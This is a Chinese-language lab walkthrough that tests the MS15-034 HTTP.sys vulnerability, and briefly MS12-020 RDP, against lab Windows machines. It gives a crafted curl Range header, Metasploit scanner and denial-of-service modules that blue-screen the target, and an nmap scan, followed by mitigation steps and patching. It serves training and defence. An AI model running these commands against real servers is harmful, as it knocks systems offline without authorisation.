Kali 192.168.124.162
Windows server 2008 192.168.124.169
检查2008服务器的IIS网站是否正常,进入2008服务器,使用ie浏览器访问本机地址
切换到kali,使用命令ping来测试他们的连通性
然后使用使用命令curl测试,测试:curl http://192.168.124.169 -H “Host:192.168.124.169” -H “Range:bytes=0-18446744073709551615”
注:根据返回的结果,HTTP400错误,客户端送的http数据流包含一个“范围”请求,规定了一个无法满足的字节范围—因为被访问的资源不覆盖这个字节范围。若返回“Requested Range Not Satisfiable”证明此处存在“整数溢出”漏洞。
使用BurpSuite发送测试代码,方便观察回包的数据,打开桌面上的burpsuite,并开启浏览器代理,再次访问目标的默认站点页面,右键点击空白处选择Send to Repeater
然后切换到Repeater选项,在GET请求的下面增加一行Range:=butes=0-18446744073709551615 最后点击Go转发
回报数据如下
注:返回内容不再是416错误,而是正常页面。最后说明服务器存在此漏洞(MS15_034)
切换kali,使用命令msfconsole打开metasploit渗透平台,使用search命令搜索相关有利用的模块
注:可以看见,上图里有两个模块,分别是dos拒绝服务模块,HTTP.sys扫描模块
使用命令令use auxiliary/scanner/http/ms15_034_http_sys_memory_dump来 调用扫描模块,使用命令show options查看需要配置的选项
接下来设置目标靶机,然后执行扫描模块
注:根据扫描结果可知,绿色加号说明目标靶机的IIS服务存在MS15_034漏洞
接着使用拒绝服务模块,来进行测试,验证漏洞在Windows Server 2008上的可用性。使用命令use auxiliary/dos/http/ms15_034_ulonglongadd来调用HTTP.SYS拒绝服务模块,然后设置RHOSTS目标靶机参数,并进行利用
注:已经发送DOS请求,目标蓝屏,由于蓝屏太快,所以没截图
注:由于上面的渗透使用2008靶机发送不了DOS请求,使用接下来的实验换成win7
Win7: 192.168.124.130
下面我们来针对该漏洞进行临时修复(可能降低IIS性能),回到靶机服务器上,打开Internet信息服 务(IIS)管理器,找到Default Web Site主页内容,选择输出缓存,点击打开功能
在的窗口中选择编辑功能设置,编辑输出缓存设置,取消启用内核缓存以实现暂时的加固
点击确定按钮
完成配置之后将IIS服务重启
回到靶机中,发现攻击模块已经失效,无法造成蓝屏重启现象
使用IIS的用户,也可以通过Windows Update的方式获得对应的KB3042553补丁,建议用户开启自动更新服务以及时安装最新补丁
注:我这里是直接更新系统,把所有需要的补丁都会安装上
使用命令use auxiliary/scanner/rdp/ms12_020_check检查靶机是否存在12-020漏洞,发现此时 目标靶机服务器状态已经变成了not exploitable(无法溢出)
使用命令nmap –n –sV –T4 –p3389 靶机ip来扫描靶机3389开放状态、
再次调用dos/windows/rdp/ms12_020_maxchannelids模块,使用命令exploit溢出模块,发现已 经无法对目标靶机进行利用。
